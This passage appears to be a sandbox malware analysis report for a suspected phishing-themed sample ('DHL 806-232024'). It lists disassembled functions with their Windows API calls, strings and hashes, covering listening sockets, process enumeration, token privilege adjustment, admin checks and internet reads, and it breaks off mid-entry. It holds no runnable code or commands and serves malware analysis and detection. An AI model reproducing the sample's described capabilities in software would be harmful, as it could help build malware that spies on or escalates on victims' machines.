Instruction ID: 36d5b986a4e6b5e8950304ba3fa1229cd3290aa03f02298350abca22654376de
Opcode Fuzzy Hash: ac19edf39cc9dd1d5ba1b2c6933349d848efad085edc48f72bb567f087e4a893
Instruction Fuzzy Hash: 9F01F7316A5B116AE72C6774EC4EBBB729CEB48353F250521FD47D20E3EA945C808A90

Function 00946596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009465EF
WSAGetLastError.WSOCK32(00000000), ref: 009465FE
bind.WSOCK32(00000000,?,00000010), ref: 0094661A
listen.WSOCK32(00000000,00000005), ref: 00946629
WSAGetLastError.WSOCK32(00000000), ref: 00946643
closesocket.WSOCK32(00000000,00000000), ref: 00946657

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: bfddb2b2b03f992b2eeebbb9d557500f6487fc4a12c017d9df210a1ff5d51781
Instruction ID: 64e7cb7f1850f2e7a4d391becbc31b813ec6a7d8bf882aca474b1933fb54d62b
Opcode Fuzzy Hash: bfddb2b2b03f992b2eeebbb9d557500f6487fc4a12c017d9df210a1ff5d51781
Instruction Fuzzy Hash: 21219E71200210AFCB10AF28D859F6EB7A9EF49721F15825AF956E73D1CB70AD01DB52

Function 008E5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041

_memmove.LIBCMT ref: 0092062F
_memmove.LIBCMT ref: 00920744
_memmove.LIBCMT ref: 009207EB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 36edcb9fbbcd49b154c8c2684fcea5d2ec7d18b7231a8d9f777637b8afae2775
Instruction ID: 149bf06bd884185c3646c306f479399120ab2c0668eeef393e4c471b067a67e2
Opcode Fuzzy Hash: 36edcb9fbbcd49b154c8c2684fcea5d2ec7d18b7231a8d9f777637b8afae2775
Instruction Fuzzy Hash: 6C029F70A00219DFDF04DF69E981AAE7BB5FF84304F148069E806DB396EB35DA54CB91

Function 008D1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 008D19FA
GetSysColor.USER32(0000000F), ref: 008D1A4E
SetBkColor.GDI32(?,00000000), ref: 008D1A61

Part of subcall function 008D1290: DefDlgProcW.USER32(?,00000020,?), ref: 008D12D8

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 9bdecfb8912e7fd60ed44b4007fbd47173bdffaca32a0fbf1ecfe27aebba7553
Instruction ID: fabf5b1bc1af014d2824ec947adc0b863d91199c18926d99ff70efadb9857803
Opcode Fuzzy Hash: 9bdecfb8912e7fd60ed44b4007fbd47173bdffaca32a0fbf1ecfe27aebba7553
Instruction Fuzzy Hash: E0A125B1115668BEEE28AA2E9C5CE7B379CFF82746B14031BF442D63D5CA148C0192B2

Function 00946A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009480A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009480CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00946AB1
WSAGetLastError.WSOCK32(00000000), ref: 00946ADA
bind.WSOCK32(00000000,?,00000010), ref: 00946B13
WSAGetLastError.WSOCK32(00000000), ref: 00946B20
closesocket.WSOCK32(00000000,00000000), ref: 00946B34

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: fa2368ca6c56da870a88eb24d4cc7fe8ebae59983c6c9ac503753dddda2e8467
Instruction ID: f51def1013c581f8cf17604f845ca88ca58eeaa15878c3104d8282eed46c712b
Opcode Fuzzy Hash: fa2368ca6c56da870a88eb24d4cc7fe8ebae59983c6c9ac503753dddda2e8467
Instruction Fuzzy Hash: E541D775740210AFEB10BF28DC86F6E77A9EB45720F04815EF956EB3C2DA705D008B92

Function 009555FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0095564C
IsWindowEnabled.USER32 ref: 0095565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00955667
IsIconic.USER32 ref: 00955675
IsZoomed.USER32 ref: 00955683

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: da1a48f3bb720c6b0d4ad77ba99bd88fbd9f57314301d0545feea4f4fabf05e4
Instruction ID: f8e7b93c5d05f2fc18daf6d74174b1d7e79f7afd0e4ae5168ec2a7d5d8b64d7b
Opcode Fuzzy Hash: da1a48f3bb720c6b0d4ad77ba99bd88fbd9f57314301d0545feea4f4fabf05e4
Instruction Fuzzy Hash: 2111B6323026606FD7119F27DC64B2F7B9CFF44722B824429F846D7242DB309905CB95

Function 0094C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00911D88,?), ref: 0094C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0094C324

Strings

kernel32.dll, xrefs: 0094C30D
GetSystemWow64DirectoryW, xrefs: 0094C31E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 04bbea7b59cae4539c13c4d4f5039beda11e9184a1bba1acc961bc5eedd94e88
Instruction ID: 0b1ef49272448a6c3f9056a89884fddd01514564e5fcfcc46e34afae58b85b37
Opcode Fuzzy Hash: 04bbea7b59cae4539c13c4d4f5039beda11e9184a1bba1acc961bc5eedd94e88
Instruction Fuzzy Hash: C4E012B4615713CFDB705F26D814E4676D8EF4976AF80C439E899D66A0E770E840CB60

Function 008E3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 4bacdfce8c9dd8984dd60fe37797fe282670451c3d406b980987ac18fd2f7f26
Instruction ID: b2aa45701d88ed7e9c5f9953320790b0ebe58cf1e6ed23495a45b1996d6211d3
Opcode Fuzzy Hash: 4bacdfce8c9dd8984dd60fe37797fe282670451c3d406b980987ac18fd2f7f26
Instruction Fuzzy Hash: C32264716083459BC724DF68C885BAAB7E4FF85314F104A2DF99A97391DB30EE44CB92

Function 0094F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0094F151
Process32FirstW.KERNEL32(00000000,?), ref: 0094F15F

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Process32NextW.KERNEL32(00000000,?), ref: 0094F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0094F22E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: ab071832d20d6c5215a7e3b7e330d01d724f3ec10f0797641de91f40e5540927
Instruction ID: 08d7baee105a5bd811e6b124dd0b1fdf2e37a10c5d942d2478bed047204fe964
Opcode Fuzzy Hash: ab071832d20d6c5215a7e3b7e330d01d724f3ec10f0797641de91f40e5540927
Instruction Fuzzy Hash: 5E514971508711AFD310EF24D895E6BBBE8FF98710F14492EF495D72A1EB70A904CB92

Function 009340B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009340D1
_memset.LIBCMT ref: 009340F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00934144
CloseHandle.KERNEL32(00000000), ref: 0093414D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: c40e67df592eddf810a580ea3b4ee294d4a5cc6604431057ad617d9ad9b034eb
Instruction ID: 96004b5c32d24a6af1999dddb554284eab8341cef5b755725e5aa192ef6f8188
Opcode Fuzzy Hash: c40e67df592eddf810a580ea3b4ee294d4a5cc6604431057ad617d9ad9b034eb
Instruction Fuzzy Hash: DA11E7759013287AE7309BA5AC4DFABBB7CEF44760F1041AAF908E7180D6744E808BA4

Function 0092EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0092EB19

Strings

(, xrefs: 0092EB5F
|, xrefs: 0092EB49

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: ed8e8784b394676b06fa58a9b8f90705f38286ecbb4aec9c6cd4b3ac94debc68
Instruction ID: b3123e56bac689f4fcf83506996231539b991a8b13d88ba417242597b4a68e86
Opcode Fuzzy Hash: ed8e8784b394676b06fa58a9b8f90705f38286ecbb4aec9c6cd4b3ac94debc68
Instruction Fuzzy Hash: A0324775A007159FDB28CF29D481A6AB7F0FF48320B15C56EE89ADB3A5DB70E941CB40

Function 009425E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00941AFE,00000000), ref: 009426D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0094270C

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: dcd3faecf8bb259f6e29b97626b43f6d8e9c92fd294693db54a4102dfa18c868
Instruction ID: d7be72ec2f1b617d375c5e50b1a0aba7bb1d065bde0f22d77ab8d89fcde2c170
Opcode Fuzzy Hash: dcd3faecf8bb259f6e29b97626b43f6d8e9c92fd294693db54a4102dfa18c868
Instruction Fuzzy Hash: 5041E271904309BFEB20DF94CC85EBBB7BCFB40728F50406AFA01A6141EA71AE419B64

Function 0093B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0093B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0093B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0093B655

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 678b2d036f3d9d448626b78e673b3fe80a3e4f52dbfb40ed59084baa27411e5c
Instruction ID: 86f31f80d6015790b5689e1a770527982cfe02e234c10e4ab63afcd2ac99e672
Opcode Fuzzy Hash: 678b2d036f3d9d448626b78e673b3fe80a3e4f52dbfb40ed59084baa27411e5c
Instruction Fuzzy Hash: FB217135A10618EFCB00EFA5D891EADBBB8FF48314F1480AAE945EB351DB31A915CF51

Function 00928CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00928D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00928D3A
GetLastError.KERNEL32 ref: 00928D47

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: b8421da2058bdb50534872bc80ea3981fb9e4b5bcf602f99fefec590d9b8967f
Instruction ID: d63dff2b57d87f31b1df164f65a50746ca513552b52ef497791bff4706ef4f06
Opcode Fuzzy Hash: b8421da2058bdb50534872bc80ea3981fb9e4b5bcf602f99fefec590d9b8967f
Instruction Fuzzy Hash: 6E1160B1414209AFD728DF68EC85D6BB7BCFB44721B24852EF45593685EF30A8448B60

Function 00934C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00934C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00934C43
FreeSid.ADVAPI32(?), ref: 00934C53

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 54ea15a62d73d5321659e10fba1ee1241ae2d83d8b11b13265e20e551f45f951
Instruction ID: eaf7e735263a1f50a15d825458d66b3e048c5e608426f96a925e32cc5ca147e0
Opcode Fuzzy Hash: 54ea15a62d73d5321659e10fba1ee1241ae2d83d8b11b13265e20e551f45f951
Instruction Fuzzy Hash: E1F04975A1130CBFDF04DFF1DC99AAEBBBCEF08311F0044A9A902E2181E6706A049B50

Function 008DE800 Relevance: 3.6, Strings: 2, Instructions: 1102COMMON

Download Yara Rule

Strings

X&, xrefs: 008DE90D, 008DE914, 008DEC1A, 008DEC21, 00913F1F, 00913F58, 009141D4
Variable must be of type 'Object'., xrefs: 0091428C

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$X&
API String ID: 0-472527329
Opcode ID: 8c5c3d6911f4923f644a91402f988d124f8b6faf33e8dc4decaa7318970410a8
Instruction ID: 26d40d1534554d6b9181985715fe3d1c9cb30b9d4dda2c3d70b415465c441fc4
Opcode Fuzzy Hash: 8c5c3d6911f4923f644a91402f988d124f8b6faf33e8dc4decaa7318970410a8
Instruction Fuzzy Hash: EAA28D74A04219DFCB24DF58C480AADB7B2FF58314F24866AE916EF351D730AD82DB91

Function 008DE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa88ec7783d74ef9b27a34bafeff0fee2c9a22413769249b9639b58ea80f8a5
Instruction ID: a5eaeb5508531c576f4210f8ff0ad30e4f000e805d4fad765b03f238187d0d1c
Opcode Fuzzy Hash: 7aa88ec7783d74ef9b27a34bafeff0fee2c9a22413769249b9639b58ea80f8a5
Instruction Fuzzy Hash: 15228E74A00219DFDB24EF68C480ABEB7B5FF04310F14866AE956DB351E734A985CB91

Function 0093C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0093C966
FindClose.KERNEL32(00000000), ref: 0093C996

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f75aa2e31a99ea19af35574a68cbecafbc62e33fe4116ca9a10c1a8bb70c8756
Instruction ID: cb094adcd6b06a84d7f78a96056096d1a80072f6667d026b3bc5b104ce052b56
Opcode Fuzzy Hash: f75aa2e31a99ea19af35574a68cbecafbc62e33fe4116ca9a10c1a8bb70c8756
Instruction Fuzzy Hash: D01161726146109FD710EF29D855A2AF7E9FF84325F018A1EF9A9D73A1DB34AC00CB81

Function 0093A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0094977D,?,0095FB84,?), ref: 0093A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0094977D,?,0095FB84,?), ref: 0093A314

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: d33834564ef357acc022fad35199d3ddf335a2cfec818f7e2efa1005e4998644
Instruction ID: eacc73c500e6d946b4bb10581e9eca141aec155abb0a657bebeaec6e67dcfd40
Opcode Fuzzy Hash: d33834564ef357acc022fad35199d3ddf335a2cfec818f7e2efa1005e4998644
Instruction Fuzzy Hash: 22F0823555932DABEB20AFA4CC48FEA776DFF08761F004266B919D7181DA309940CBA1

Function 00928713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00928851), ref: 00928728
CloseHandle.KERNEL32(?,?,00928851), ref: 0092873A

Memory Dump Source

